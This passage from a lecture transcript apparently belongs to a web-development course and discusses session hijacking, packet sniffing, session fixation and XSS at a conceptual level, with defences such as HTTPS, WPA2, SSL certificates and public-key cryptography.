00:36:23,236 --> 00:36:27,006
about colon cookies,
or about colon history.

840
00:36:27,006 --> 00:36:28,946
Generally in all browsers
you can start poking

841
00:36:28,946 --> 00:36:30,236
around your own history.

842
00:36:30,506 --> 00:36:32,596
So if you have physical
access to your sibling's

843
00:36:32,596 --> 00:36:34,026
or your roommate's computer

844
00:36:34,096 --> 00:36:37,006
and they've left it unlocked
there's really not much

845
00:36:37,006 --> 00:36:39,046
of a barrier between
you and their cookies.

846
00:36:39,046 --> 00:36:41,286
It might take some
technical know-how but frankly

847
00:36:41,286 --> 00:36:44,116
if you Google how to find
cookies in Firefox or the like,

848
00:36:44,116 --> 00:36:46,376
I'm sure someone has
posted how you can go

849
00:36:46,376 --> 00:36:48,306
about finding cookies
in various browsers.

850
00:36:48,306 --> 00:36:51,266
Useful for diagnostic
purposes, a little scary

851
00:36:51,266 --> 00:36:55,416
if you're vulnerable to
having your session hijacked.

852
00:36:55,926 --> 00:36:56,646
Packet sniffing.

853
00:36:56,646 --> 00:36:58,946
So we talked about this earlier,
whereby it's really not all

854
00:36:58,946 --> 00:37:00,646
that hard to download
free software these days

855
00:37:00,646 --> 00:37:02,166
that just sniffs
wireless traffic

856
00:37:02,426 --> 00:37:03,886
in Starbucks, in this room.

857
00:37:03,986 --> 00:37:06,166
Anytime you're not using
something like WPA2,

858
00:37:06,166 --> 00:37:08,606
the encryption protocol
that's used by a lot

859
00:37:08,606 --> 00:37:11,226
of wireless routers these
days to encrypt your traffic,

860
00:37:11,546 --> 00:37:14,476
well then anyone's sitting near
you right now could be sniffing

861
00:37:14,476 --> 00:37:16,416
your traffic and
stealing your cookie

862
00:37:16,706 --> 00:37:19,306
from any website
that's unencrypted.

863
00:37:19,546 --> 00:37:22,696
So session fixation is just
a necessarily fancy way

864
00:37:22,696 --> 00:37:25,516
of saying hardcoding a
session ID as your own.

865
00:37:25,716 --> 00:37:28,316
Now in theory you could just
guess someone's session ID

866
00:37:28,706 --> 00:37:31,316
by picking a random sequence
of letters and numbers,

867
00:37:31,616 --> 00:37:33,576
but the reality is, as
you saw, these things are

868
00:37:33,576 --> 00:37:36,156
so long that's going to take
a huge amount of time for you

869
00:37:36,156 --> 00:37:38,236
to try guessing all
possible session values --

870
00:37:38,546 --> 00:37:40,836
session keys and that's
why they're so long.

871
00:37:40,876 --> 00:37:42,946
But as soon as you found
it maybe by sniffing

872
00:37:42,946 --> 00:37:45,646
or physical access,
session fixation just refers

873
00:37:45,726 --> 00:37:50,296
to the spoofing of your own
cookie as by writing a program

874
00:37:50,296 --> 00:37:52,706
or downloading some program
that says here, use this cookie

875
00:37:52,706 --> 00:37:55,076
as my own and not what
the web server gave me.

876
00:37:55,076 --> 00:37:57,636
And then XSS, cross
site scripting attacks,

877
00:37:57,636 --> 00:37:59,226
we've discussed these a
couple times, and we'll see

878
00:37:59,226 --> 00:38:01,416
in just a little bit an example.

879
00:38:02,106 --> 00:38:04,756
So how do we mitigate
these threats?

880
00:38:04,756 --> 00:38:06,896
Like this is a bunch of
scenarios, all of which lead

881
00:38:06,896 --> 00:38:09,826
to a bad ending for me whereby
my session's been hijacked.

882
00:38:10,286 --> 00:38:11,936
What kinds of defenses
do we have

883
00:38:11,936 --> 00:38:13,986
against these various scenarios?

884
00:38:15,416 --> 00:38:15,726
Axle?

885
00:38:16,096 --> 00:38:18,376
>> Well, physical access,
you don't really have

886
00:38:18,376 --> 00:38:20,216
that much defense against.

887
00:38:20,276 --> 00:38:22,896
Once somebody has your
computer they can essentially

888
00:38:22,896 --> 00:38:23,666
do everything.

889
00:38:23,666 --> 00:38:23,886
>> Okay.

890
00:38:24,246 --> 00:38:27,636
>> But the packet sniffing
and session fixation,

891
00:38:27,766 --> 00:38:31,276
that could be fixed by sending
the data encrypted by --

892
00:38:31,276 --> 00:38:31,796
>> Good.

893
00:38:32,156 --> 00:38:38,636
>> -- HTTPS and the XSS could be
fixed by being really thorough

894
00:38:38,636 --> 00:38:40,916
and escaping everything that
the user sends [inaudible].

895
00:38:41,086 --> 00:38:42,746
>> Okay, good.

896
00:38:42,746 --> 00:38:44,696
So in the case of packet
sniffing especially,

897
00:38:44,696 --> 00:38:46,856
just using HTTPS
goes a long way,

898
00:38:47,136 --> 00:38:49,716
because HTTPS is end-to-end
encryption between points A

899
00:38:49,746 --> 00:38:53,766
and point B. And in
this way you're ensuring

900
00:38:53,766 --> 00:38:56,556
that you're cookies are
among the things encrypted

901
00:38:56,846 --> 00:39:00,136
so no one can see actually
what you've encrypted

902
00:39:00,136 --> 00:39:01,006
in that scenario.

903
00:39:01,036 --> 00:39:05,386
All right, but HTTPS, the
website doesn't offer HTTPS,

904
00:39:05,476 --> 00:39:09,346
so what if I just instead
turn on the encryption feature

905
00:39:09,346 --> 00:39:13,176
of my wireless router, in
Starbucks or in my home,

906
00:39:13,426 --> 00:39:14,836
or even on Harvard's campus?

907
00:39:14,836 --> 00:39:16,326
What if I just turn WPA2

908
00:39:16,326 --> 00:39:20,166
so there's a little padlock
icon then next to the name

909
00:39:20,226 --> 00:39:23,696
of the router in my list
on Mac OS or Windows?

910
00:39:24,036 --> 00:39:24,716
Does that solve it?

911
00:39:24,716 --> 00:39:24,826
Yeah?

912
00:39:25,276 --> 00:39:27,386
>> Well anybody who's ever
done a trace route sees

913
00:39:27,476 --> 00:39:30,346
that the actual packet is sent
through multiple [inaudible]

914
00:39:30,346 --> 00:39:33,146
and many networks before
it actually arrives,

915
00:39:33,256 --> 00:39:36,126
so anybody on any of those
networks can essentially do it

916
00:39:36,356 --> 00:39:38,056
even if they don't have --

917
00:39:38,056 --> 00:39:40,786
and if they don't have
WPA2 they can sniff it.

918
00:39:41,176 --> 00:39:41,856
>> Okay, good.

919
00:39:41,856 --> 00:39:45,326
And to be clear then, when I
turn on something like WPA2

920
00:39:45,326 --> 00:39:48,506
and connect to an access
point, a WiFi access point

921
00:39:48,706 --> 00:39:51,436
that requires a password, for
instance that one right there

922
00:39:51,436 --> 00:39:53,216
on the wall with the
green blinking light,

923
00:39:54,566 --> 00:39:57,056
where is my data encrypted,
between what points?

924
00:39:58,496 --> 00:39:58,616
Yeah?

925
00:39:59,386 --> 00:40:00,936
>> Well, your computer
and the router.

926
00:40:01,176 --> 00:40:02,876
>> Good. And where
is it not encrypted?

927
00:40:03,166 --> 00:40:03,626
>> Anywhere else.

928
00:40:04,006 --> 00:40:06,286
>> Good, between the
router and anywhere else.

929
00:40:06,286 --> 00:40:07,516
All right, so good.

930
00:40:07,516 --> 00:40:09,896
So, what's the implication
there?

931
00:40:09,896 --> 00:40:12,326
Well, you're protecting yourself
against someone in Starbucks

932
00:40:12,326 --> 00:40:14,696
but you're not protecting
someone who's somehow sitting

933
00:40:14,696 --> 00:40:18,476
between you and point B, whether
it's some random staff member

934
00:40:18,476 --> 00:40:20,196
in some facility
that has a router

935
00:40:20,326 --> 00:40:22,056
or it's someone in
Amazon's area.

936
00:40:22,446 --> 00:40:24,606
In short, you don't have
true end-to-end encryption.

937
00:40:24,606 --> 00:40:26,186
So, better, but not great.

938
00:40:26,476 --> 00:40:30,586
And XSS we'll come back
to in just a bit as to how

939
00:40:30,586 --> 00:40:32,076
to try protecting that.

940
00:40:32,506 --> 00:40:34,746
But there's some other
things I propose here.

941
00:40:35,066 --> 00:40:37,436
Hard-to-guess session keys.

942
00:40:37,786 --> 00:40:39,356
So frankly they're already
pretty hard to guess

943
00:40:39,566 --> 00:40:44,486
but clearly PHP long session
are not a complete protection,

944
00:40:44,686 --> 00:40:45,336
because again, as soon

945
00:40:45,336 --> 00:40:46,776
as you sniff then you
can just copy/paste.

946
00:40:46,936 --> 00:40:49,076
So making them even longer
is probably not going

947
00:40:49,076 --> 00:40:49,776
to gain as much.

948
00:40:50,146 --> 00:40:51,876
What about rekeying the session?

949
00:40:51,876 --> 00:40:57,076
In other words changing the user
session ID, changing the value

950
00:40:57,076 --> 00:41:01,796
of their PHPSESSID cookie every
few seconds, every few minutes,

951
00:41:02,026 --> 00:41:05,196
every request, whatever, just
change it once in a while.

952
00:41:05,446 --> 00:41:06,046
Good? Bad?

953
00:41:07,366 --> 00:41:07,686
Axle?

954
00:41:07,686 --> 00:41:12,316
>> I see a potential
risk for that.

955
00:41:12,966 --> 00:41:15,396
Wouldn't you be sending
the session --

956
00:41:15,806 --> 00:41:19,356
wouldn't you be sending it
many times so that somebody

957
00:41:19,356 --> 00:41:20,436
on the network could see well,

958
00:41:20,556 --> 00:41:23,806
this computer is every minute
sending out a session ID

959
00:41:23,806 --> 00:41:26,026
and I know it lasts for
a minute, so they'll see.

960
00:41:26,076 --> 00:41:29,586
If you just send it once then
it might be harder for somebody

961
00:41:29,586 --> 00:41:32,626
to actually find that in
[inaudible] in all the traffic.

962
00:41:32,716 --> 00:41:32,916
>> Okay.

963
00:41:33,096 --> 00:41:35,456
>> If you send it continuously
somebody might notice that

964
00:41:35,456 --> 00:41:37,286
and that might be
a security threat,

965
00:41:37,286 --> 00:41:39,536
even though it only lasts for
like a minute or whatever.

966
00:41:39,536 --> 00:41:40,276
>> Okay, good.

967
00:41:40,276 --> 00:41:43,616
So rekeying really just means
sending a new set cookie header,

968
00:41:43,866 --> 00:41:45,166
but the problem is
if you're worried

969
00:41:45,166 --> 00:41:46,616
about people sniffing your keys

970
00:41:46,616 --> 00:41:49,306
and that's why you're changing
the key, well if the threat is

971
00:41:49,306 --> 00:41:51,196
that they're sniffing your
keys you can change it as much

972
00:41:51,196 --> 00:41:52,926
as you want, the bad
guy's still just going

973
00:41:52,926 --> 00:41:53,836
to sniff the new ones.

974
00:41:53,836 --> 00:41:56,536
So you might be making his life
more annoying in that he has

975
00:41:56,536 --> 00:41:59,466
to constantly stay up to
date with your latest key,

976
00:41:59,696 --> 00:42:01,626
but actually there's
a worse scenario here.

977
00:42:01,626 --> 00:42:03,846
If the web server is
changing the key --

978
00:42:04,206 --> 00:42:07,666
>> Well if the person,
whoever's trying hack in,

979
00:42:07,826 --> 00:42:11,106
sniffs your cookie or your
key, sniffs your session

980
00:42:11,726 --> 00:42:14,546
and takes the session and
they log on in some period

981
00:42:14,546 --> 00:42:17,346
of time while it's
expired, the session,

982
00:42:17,476 --> 00:42:19,596
they get your session
ID and they also make it

983
00:42:20,136 --> 00:42:22,446
so that you can't [inaudible]
on with that same session.

984
00:42:22,586 --> 00:42:22,976
>> Perfect.

985
00:42:22,976 --> 00:42:26,256
If you rekey the session but the
bad guy's already sniffed your

986
00:42:26,386 --> 00:42:30,566
initial ID, spoofed his
own as yours, so as to log

987
00:42:30,566 --> 00:42:32,086
into your Facebook
account or whatever,

988
00:42:32,366 --> 00:42:34,866
and now the server decides
okay, it's time to rekey

989
00:42:34,866 --> 00:42:36,246
to prevent bad guys
from getting in,

990
00:42:36,246 --> 00:42:38,826
whose going to get the
new key potential first?

991
00:42:38,826 --> 00:42:42,756
The bad guy, at which point
your cookie no longer valid

992
00:42:43,026 --> 00:42:44,836
so you've effectively just been
logged out of your account.

993
00:42:45,256 --> 00:42:47,516
So in short, rekeying
while it may seem like, oh,

994
00:42:47,516 --> 00:42:49,606
this is a good way to sort
of dodge the adversary,

995
00:42:49,926 --> 00:42:51,306
doesn't really fundamentally
help us

996
00:42:51,306 --> 00:42:53,236
because it's still
sending the rekeying

997
00:42:53,236 --> 00:42:55,006
over the same insecure
mechanism.

998
00:42:55,296 --> 00:42:57,966
Encryption, this is actually
pretty decent solution,

999
00:42:57,966 --> 00:43:01,546
and using at least
something like WiFi

1000
00:43:01,646 --> 00:43:04,346
with encryption enabled so at
least you're not vulnerable

1001
00:43:04,346 --> 00:43:06,096
to random people who are
sitting in the airport

1002
00:43:06,096 --> 00:43:07,706
or Starbucks or bored near you.

1003
00:43:07,996 --> 00:43:10,406
More likely than not someone
near you cares a little more

1004
00:43:10,406 --> 00:43:12,326
about your data, roommate,
sibling, or whatnot,

1005
00:43:12,326 --> 00:43:13,936
than some random
person on the Internet.

1006
00:43:13,936 --> 00:43:17,296
So at least that raises the bar,
but even better would be HTTPS.

1007
00:43:17,416 --> 00:43:19,266
Unfortunately not all
servers support that

1008
00:43:19,496 --> 00:43:21,456
and indeed it was
only a year or so ago

1009
00:43:21,456 --> 00:43:25,176
that Google started offering
it for Gmail by default,

1010
00:43:25,276 --> 00:43:29,276
and Facebook only a few months
back started offering SSL

1011
00:43:29,276 --> 00:43:30,476
support as well.

1012
00:43:31,106 --> 00:43:33,306
So, not all websites
have done it.

1013
00:43:33,556 --> 00:43:34,996
Because what's involved in SSL?

1014
00:43:34,996 --> 00:43:39,006
How do you make your
site run on HTTPS?

1015
00:43:39,006 --> 00:43:39,836
What do you need?

1016
00:43:40,236 --> 00:43:40,303
Yeah?

1017
00:43:40,506 --> 00:43:44,776
>> Well you buy a certificate
that a person sells and the way

1018
00:43:44,776 --> 00:43:48,926
that people sell certificates
is through a big chain of trust.

1019
00:43:48,926 --> 00:43:53,726
Yeah, somebody trusts
somebody and all the vendors,

1020
00:43:53,726 --> 00:43:55,716
so that sells certificates,
they're backed

1021
00:43:55,716 --> 00:43:57,706
up by bigger players,
big companies.

1022
00:43:57,736 --> 00:44:00,086
So that's essentially
how it works.

1023
00:44:00,466 --> 00:44:04,286
And it's not really -- it
can be assuring for the user

1024
00:44:04,596 --> 00:44:07,796
but it's mostly just
getting the green bar

1025
00:44:08,146 --> 00:44:12,276
and then an image say
certificate, like [inaudible].

1026
00:44:12,426 --> 00:44:13,076
>> Okay. Good.

1027
00:44:13,076 --> 00:44:16,766
So, in short if you want to
enable SSL on your server, one,

1028
00:44:16,766 --> 00:44:19,666
you have to buy -- or you
should buy a certificate

1029
00:44:19,736 --> 00:44:21,666
from someone reasonably
reputable.

1030
00:44:21,666 --> 00:44:23,166
You don't need to break
the bank by paying

1031
00:44:23,166 --> 00:44:25,276
for $1000 VeriSign certificates.

1032
00:44:25,276 --> 00:44:28,236
Generally $50 or
$100 ones from places

1033
00:44:28,236 --> 00:44:30,146
like GoDaddy or the
like suffice.

1034
00:44:30,526 --> 00:44:33,146
But you do have to buy this
because you need someone else

1035
00:44:33,426 --> 00:44:39,286
to endorse that fact that
you are who you say you are.

1036
00:44:39,286 --> 00:44:40,646
In other words, if
I go to GoDaddy

1037
00:44:40,646 --> 00:44:42,746
and by a certificate
before they give me

1038
00:44:42,746 --> 00:44:44,766
that certificate they're
going to send an email

1039
00:44:44,946 --> 00:44:47,396
to the email address of the
person who bought that domain.

1040
00:44:47,596 --> 00:44:49,916
Hopefully it's me, because if
that's the case they're going

1041
00:44:49,916 --> 00:44:51,336
to send an email to
the email address

1042
00:44:51,336 --> 00:44:53,466
with which I bought the domain,
that email account I'm going

1043
00:44:53,466 --> 00:44:55,816
to check, I'm going to
see, oh, someone is trying

1044
00:44:55,816 --> 00:44:59,126
to buy an SSL certificate
for CS75.net, is this okay?

1045
00:44:59,126 --> 00:45:00,346
Click this link to approve.

1046
00:45:00,496 --> 00:45:02,686
And if indeed I've received
that email I can approve it.

1047
00:45:02,826 --> 00:45:06,176
By contrast, if Axle owns some
domain name, like Axle.com,

1048
00:45:06,406 --> 00:45:09,426
and I want to, for whatever
reason buy an SSL certificate

1049
00:45:09,426 --> 00:45:10,206
for his domain.

1050
00:45:10,306 --> 00:45:11,976
Because maybe I'm
trying to trick users

1051
00:45:11,976 --> 00:45:15,246
into visiting my website by
calling it the same domain

1052
00:45:15,246 --> 00:45:17,096
and therefore, I want
to trick them even more

1053
00:45:17,096 --> 00:45:19,836
into thinking it's secure
by buying an SSL certificate

1054
00:45:19,926 --> 00:45:23,096
for his domain name, he's going
to get that email confirmation

1055
00:45:23,096 --> 00:45:25,676
because he bought the domain,
he gave them his email address,

1056
00:45:25,956 --> 00:45:26,996
and unfortunately
they're not going

1057
00:45:27,046 --> 00:45:29,456
to hand me the SSL
certificate until he confirms.

1058
00:45:29,666 --> 00:45:32,916
And unless he actually confirms
and isn't reading the email,

1059
00:45:32,916 --> 00:45:36,186
well then I'm going to get
that certificate after all.

1060
00:45:36,406 --> 00:45:38,626
So once I do that I
install it in my web server.

1061
00:45:38,626 --> 00:45:40,986
We saw a while back
in http.conf you have

1062
00:45:40,986 --> 00:45:42,886
to specify the file
name of the certificate

1063
00:45:42,886 --> 00:45:45,616
that you've downloaded as well
as your so-called private key,

1064
00:45:45,616 --> 00:45:47,766
which is a number that
you have generated.

1065
00:45:47,766 --> 00:45:50,546
Because at the end of the
day recall that SSL boils

1066
00:45:50,546 --> 00:45:52,716
down to this thing called
public key cryptography,

1067
00:45:53,126 --> 00:45:58,036
which is a mechanism
mathematically whereby a person

1068
00:45:58,036 --> 00:46:02,026
has a private key and public
key, and which of those is used

1069
00:46:02,026 --> 00:46:04,396
for what process when
it comes to encryption?

1070
00:46:05,486 --> 00:46:07,376
With which of those
keys, private or public,

1071
00:46:07,726 --> 00:46:10,366
do you encrypt information
if you know?

1072
00:46:10,936 --> 00:46:15,256
Yeah? Axle?

1073
00:46:15,396 --> 00:46:17,736
>> The private one?

1074
00:46:18,036 --> 00:46:21,086
>> Not a bad guess,
but it's the opposite.

1075
00:46:21,146 --> 00:46:24,676
So in this case, in public-key
crypto you start the process

1076
00:46:24,676 --> 00:46:27,176
by generating two
really big random numbers

1077
00:46:27,236 --> 00:46:28,766
that are somehow --
not quite random,

1078
00:46:28,766 --> 00:46:30,436
they're somehow mathematically
related.

1079
00:46:30,736 --> 00:46:31,926
And they have these
key properties

1080
00:46:31,926 --> 00:46:35,926
in public-key crypto whereby
the private key is the only key

1081
00:46:35,926 --> 00:46:39,566
in the world that can decrypt
information that's been

1082
00:46:39,566 --> 00:46:40,906
encrypted with the public key.

1083
00:46:41,226 --> 00:46:42,366
Now why is this compelling?

1084
00:46:42,646 --> 00:46:44,376
The fact that I have
two keys is really nice

1085
00:46:44,496 --> 00:46:47,116
because suppose now
Jack and I --

1086
00:46:47,116 --> 00:46:50,306
suppose I'm a user on the
Internet and Jack has a website

1087
00:46:50,306 --> 00:46:51,836
and he's trying to sell widgets

1088
00:46:51,836 --> 00:46:53,806
on this website securely
using HTTPS,

1089
00:46:53,806 --> 00:46:55,676
and therefore he's
brought an SSL certificate

1090
00:46:55,956 --> 00:46:58,166
and somehow I need to
communicate securely with Jack.

1091
00:46:58,436 --> 00:47:01,386
Well, unfortunately most
encryption algorithms assume a

1092
00:47:01,386 --> 00:47:03,246
private secret between
me and Jack.

1093
00:47:03,526 --> 00:47:05,376
For instance, if you think
back to a silly example

1094
00:47:05,376 --> 00:47:08,386
in grade school, if you wanted
to pass a note to a classmate

1095
00:47:08,386 --> 00:47:10,226
or someone you were crushing on.

1096
00:47:10,226 --> 00:47:12,456
You want to send them a
secret note, literally pass it

1097
00:47:12,506 --> 00:47:14,896
to a classmate and then
give it to the boy or girl

1098
00:47:14,896 --> 00:47:17,296
across the room, but you
don't really want the teacher,

1099
00:47:17,296 --> 00:47:19,436
let alone the kids between
you and that boy or girl

1100
00:47:19,436 --> 00:47:21,906
to intercept it and read
your secret love note,

1101
00:47:21,906 --> 00:47:22,876
or whatever it is
you're sending.

1102
00:47:23,176 --> 00:47:25,116
So a kid might do
something super simple,

1103
00:47:25,716 --> 00:47:28,916
like change the letters around,
so instead of sending an A,

1104
00:47:28,916 --> 00:47:31,126
you say a B. Instead
of writing a B,

1105
00:47:31,126 --> 00:47:33,316
you write a C. C,
D, and so forth.

1106
00:47:33,316 --> 00:47:34,566
Something simple like that,

1107
00:47:34,936 --> 00:47:37,596
and in fact there's an algorithm
known as the Caesar cipher,

1108
00:47:37,776 --> 00:47:41,266
or ROT13, which is a
specific example of this

1109
00:47:41,266 --> 00:47:42,526
that does exactly that.

1110
00:47:42,636 --> 00:47:44,266
Right? Because what's a
non-technical teacher going

1111
00:47:44,266 --> 00:47:44,476
to do?

1112
00:47:44,476 --> 00:47:45,726
They're going to see this
note, it's going to look

1113
00:47:45,726 --> 00:47:48,406
like nonsense, they're not
going to know what it is,

1114
00:47:48,406 --> 00:47:51,106
or they're at least not going to
care to decrypt it by figuring

1115
00:47:51,106 --> 00:47:52,466
out how you encrypted it.

1116
00:47:52,466 --> 00:47:55,316
So, in short, nice little
childhood encryption scheme.

1117
00:47:55,746 --> 00:47:58,766
So the problem with that is that
if Jack is some random website

1118
00:47:58,766 --> 00:48:00,846
on the Internet from whom
I want to buy something

1119
00:48:00,846 --> 00:48:02,196
for the first time, Jack

1120
00:48:02,196 --> 00:48:05,066
and I do not have some known
algorithm that we can use.

1121
00:48:05,066 --> 00:48:07,206
I can't just write
him a purchase order

1122
00:48:07,366 --> 00:48:10,086
and then encrypt it by
changing A's to B's, B's to C's,

1123
00:48:10,086 --> 00:48:11,436
and handing it to
him over the Internet

1124
00:48:11,436 --> 00:48:13,136
because he's obviously
not going to know how

1125
00:48:13,136 --> 00:48:14,366
to reverse that process.

1126
00:48:14,836 --> 00:48:18,236
So, I could call him up, we
could agree on some secret

1127
00:48:18,236 --> 00:48:20,606
like rotate all the letters
one place or something stupid

1128
00:48:20,606 --> 00:48:23,456
like that, but obviously this
is not how Amazon.com works,

1129
00:48:23,456 --> 00:48:24,686
or real stores work.

1130
00:48:24,896 --> 00:48:28,266
So public-key crypto is an
alternative to that scenario,

1131
00:48:28,266 --> 00:48:30,476
which is generally called
secret-key crypto where Jack

1132
00:48:30,476 --> 00:48:31,346
and I have some secret.

1133
00:48:31,346 --> 00:48:33,916
If that's not going to work
I can instead use public-key

1134
00:48:33,916 --> 00:48:37,476
crypto whereby I have a
public key and a private key,

1135
00:48:37,796 --> 00:48:39,646
Jack has a public key
and a private key,

1136
00:48:39,676 --> 00:48:41,626
and the nice feature
of public keys is

1137
00:48:41,626 --> 00:48:44,366
that as their name suggests you
can broadcast them to the world.

1138
00:48:44,366 --> 00:48:45,746
You can display them
on your website.

1139
00:48:45,746 --> 00:48:47,286
You can put them in
your email signatures.

1140
00:48:47,286 --> 00:48:48,626
You can just send
them in the clear

1141
00:48:48,626 --> 00:48:51,426
over the Internet whenever
someone asks you for it.

1142
00:48:51,656 --> 00:48:54,686
And indeed the way SSL
and other algorithms work

1143
00:48:54,686 --> 00:48:57,536
to get started is if I am
trying to buy something

1144
00:48:57,536 --> 00:48:59,626
from Jack's website
and it's using SSL,

1145
00:48:59,956 --> 00:49:02,526
Jack's website essentially says,
"Here, this is my public-key,

1146
00:49:02,526 --> 00:49:04,616
use this to send me
information securely."

1147
00:49:04,866 --> 00:49:07,206
And before I send him
any messages or orders

1148
00:49:07,206 --> 00:49:10,396
or credit card information
I first take my information

1149
00:49:10,396 --> 00:49:12,096
and I encrypt it
with his public key,

1150
00:49:12,386 --> 00:49:15,146
then I transmit the cipher
text, the scrambled stuff,

1151
00:49:15,296 --> 00:49:17,856
across the Internet to him,
because what's the only key

1152
00:49:17,856 --> 00:49:20,466
in the world that can unlock
or decrypt that message now?

1153
00:49:21,306 --> 00:49:21,606
Axle?

1154
00:49:21,896 --> 00:49:23,216
>> Well, that's the private key.

1155
00:49:23,216 --> 00:49:23,956
>> The private key.

1156
00:49:23,956 --> 00:49:24,826
>> He's the only
one who has that.

1157
00:49:25,016 --> 00:49:25,446
>> Exactly.

1158
00:49:25,506 --> 00:49:27,816
He, by definition of
private is the only one

1159
00:49:27,816 --> 00:49:28,816
who should have that.

1160
00:49:28,886 --> 00:49:30,866
He's made a mistake if he
gives it to anyone else.

1161
00:49:31,126 --> 00:49:33,306
So only he should be able
to decrypt that message.

1162
00:49:33,306 --> 00:49:34,326
And similarly if he wants

1163
00:49:34,326 --> 00:49:37,086
to send me a secret message I
can just give him my public key,

1164
00:49:37,086 --> 00:49:40,596
like I can anyone else,
and that process can happen

1165
00:49:40,596 --> 00:49:41,706
in the other direction as well.

1166
00:49:41,986 --> 00:49:44,286
In reality something like
SSL uses a little bit

1167
00:49:44,286 --> 00:49:46,506
of public-key crypto as well
as some other techniques

1168
00:49:46,506 --> 00:49:49,006
because it tends to be a little
more expensive computationally

1169
00:49:49,326 --> 00:49:53,746
than secret-key crypto, but that
in general is the key property.

1170
00:49:54,056 --> 00:49:55,766
So, how does this help us?

1171
00:49:55,766 --> 00:49:59,536
Well, so SSL is again, as Axle
said, it's this chain of trust.

1172
00:49:59,536 --> 00:50:04,066
You buy an SSL certificate and
it will just work mathematically

1173
00:50:04,296 --> 00:50:05,946
but until the browser --

1174
00:50:05,946 --> 00:50:08,476
until you pay someone
for that certificate

1175
00:50:08,476 --> 00:50:11,896
and have them digitally sign
the certificate, so to speak,

1176
00:50:12,086 --> 00:50:14,006
no one else in the
world is supposed

1177
00:50:14,006 --> 00:50:14,976
to trust the certificate.

1178
00:50:15,396 --> 00:50:18,036
Because recall from a few
weeks ago various browsers, IE,

1179
00:50:18,846 --> 00:50:22,146
and Firefox, and Chrome,
and the like all ship

1180
00:50:22,496 --> 00:50:25,696
with certain certificate
authority keys in them --

1181
00:50:25,696 --> 00:50:28,636
certificate authority
certificates in them,

1182
00:50:28,636 --> 00:50:33,276
which says Chrome will trust any
SSL certificate from GoDaddy,

1183
00:50:33,276 --> 00:50:35,296
from VeriSign, and from
this list of a whole bunch

1184
00:50:35,346 --> 00:50:37,776
of other SSL certificate
selling companies.

1185
00:50:38,196 --> 00:50:40,946
So, if you have not bought
your certificate from one

1186
00:50:40,946 --> 00:50:43,946
of those companies Chrome is
going to do what to the user

1187
00:50:43,946 --> 00:50:45,156
when you try to visit
the website?

1188
00:50:45,286 --> 00:50:45,466
Jack?

1189
00:50:45,676 --> 00:50:48,896
>> Send some crazy warning
to you that says like,

1190
00:50:48,896 --> 00:50:50,706
this site has an invalid
security certificate

1191
00:50:50,706 --> 00:50:53,916
and you shouldn't stay here,

1192
00:50:53,916 --> 00:50:55,086
or it might be dangerous
[inaudible].

1193
00:50:55,446 --> 00:50:55,966
>> Exactly.

1194
00:50:56,226 --> 00:50:58,646
You will get some warning
message scaring you.

1195
00:50:59,016 --> 00:51:00,796
Chrome tends to look
like this right now.

1196
00:51:00,796 --> 00:51:02,726
"This site's security
certificate is not trusted!"

1197
00:51:03,046 --> 00:51:04,906
I ironically as I did
a few weeks ago went

1198
00:51:04,966 --> 00:51:07,996
to cs.harvard.edu, which has
not paid for an SSL certificate,

1199
00:51:08,236 --> 00:51:10,866
and you see a big red X, you
see a big red screen here

1200
00:51:10,866 --> 00:51:13,556
which means you can't actually
proceed unless you click

1201
00:51:13,806 --> 00:51:14,356
this button.

1202
00:51:14,356 --> 00:51:17,006
Now, out of curiosity
what do most of you do

1203
00:51:17,006 --> 00:51:18,616
when you encounter
a website like this?

1204
00:51:19,916 --> 00:51:20,046
Ben?

1205
00:51:20,046 --> 00:51:20,916
>> Keep going.

1206
00:51:20,916 --> 00:51:21,736
>> You just keep going.

1207
00:51:21,736 --> 00:51:23,146
Anyone else just keep going?

1208
00:51:24,066 --> 00:51:24,786
Yeah? Axle?

1209
00:51:24,786 --> 00:51:25,186
I mean I do.

1210
00:51:25,186 --> 00:51:27,216
>> If you wanted to access the
website in the first place.

1211
00:51:27,476 --> 00:51:28,766
>> Right, if you want
to access the website

1212
00:51:28,766 --> 00:51:30,856
and you know you haven't
mistyped it, so you haven't gone

1213
00:51:30,856 --> 00:51:32,216
to some sketchy random website.

1214
00:51:32,216 --> 00:51:33,286
You're where you want to be.

1215
00:51:33,556 --> 00:51:35,806
This generally signifies
an error,

1216
00:51:35,806 --> 00:51:37,706
or a lack of payment,
or the like.

1217
00:51:37,966 --> 00:51:40,336
So I would propose, and I
have no data to back this up,

1218
00:51:40,336 --> 00:51:41,946
that most people
probably proceed.

1219
00:51:42,146 --> 00:51:45,106
Now, on fairness, Chrome makes
it pretty easy to proceed,

1220
00:51:45,106 --> 00:51:47,416
you literally just
click proceed now.

1221
00:51:47,696 --> 00:51:52,296
If I instead use something
like Firefox and go in here,

1222
00:51:54,846 --> 00:51:57,206
Firefox is a real
pain in the neck.

1223
00:51:57,406 --> 00:52:02,386
So, if you've ever used
Firefox here is how you get

1224
00:52:02,386 --> 00:52:03,006
around this issue.

1225
00:52:03,006 --> 00:52:05,616
And this is kind of tragic
because if you do screw up,

1226
00:52:05,616 --> 00:52:06,976
or you don't want to
pay for a certificate,

1227
00:52:06,976 --> 00:52:07,936
and you pretty much should.

1228
00:52:08,226 --> 00:52:10,466
Or if you generate
your own certificate

1229
00:52:10,466 --> 00:52:12,266
and do what's called
self-signing it,

1230
00:52:12,266 --> 00:52:14,216
in other words you do
the mathematics yourself,

1231
00:52:14,216 --> 00:52:17,146
which is totally legitimate
in terms of the formula,

1232
00:52:17,506 --> 00:52:20,426
but you haven't had anyone
else vouch for you like GoDaddy

1233
00:52:20,426 --> 00:52:23,676
or VeriSign, here is what
your friends or family

1234
00:52:23,676 --> 00:52:26,976
or customers would
have to do on Firefox.

1235
00:52:27,086 --> 00:52:29,446
One, they're probably not going
to click "get me out of here."

1236
00:52:29,646 --> 00:52:32,076
They're instead going to have to
click "I understand the risks."

1237
00:52:32,456 --> 00:52:38,246
Add exception, get certificate,
confirm security exception.

1238
00:52:38,786 --> 00:52:42,216
And now you can proceed,
and so forth.

1239
00:52:42,716 --> 00:52:44,426
And right now it's
hanging for just a moment.

1240
00:52:44,426 --> 00:52:44,866
There we go.

1241
00:52:45,226 --> 00:52:47,196
Now it redirected to
the actual CS page.

1242
00:52:47,456 --> 00:52:50,986
So no, most people are not going
to do that, even I get annoyed

1243
00:52:50,986 --> 00:52:53,076
as anything when I have
to go through those hoops.

1244
00:52:53,076 --> 00:52:55,996
So in short, this is why you
pay for an SSL certificate.

1245
00:52:56,136 --> 00:52:57,826
Now the theory behind
it is great.

1246
00:52:57,896 --> 00:53:00,076
As we discussed a couple
weeks ago, chain of trust,

1247
00:53:00,076 --> 00:53:02,516
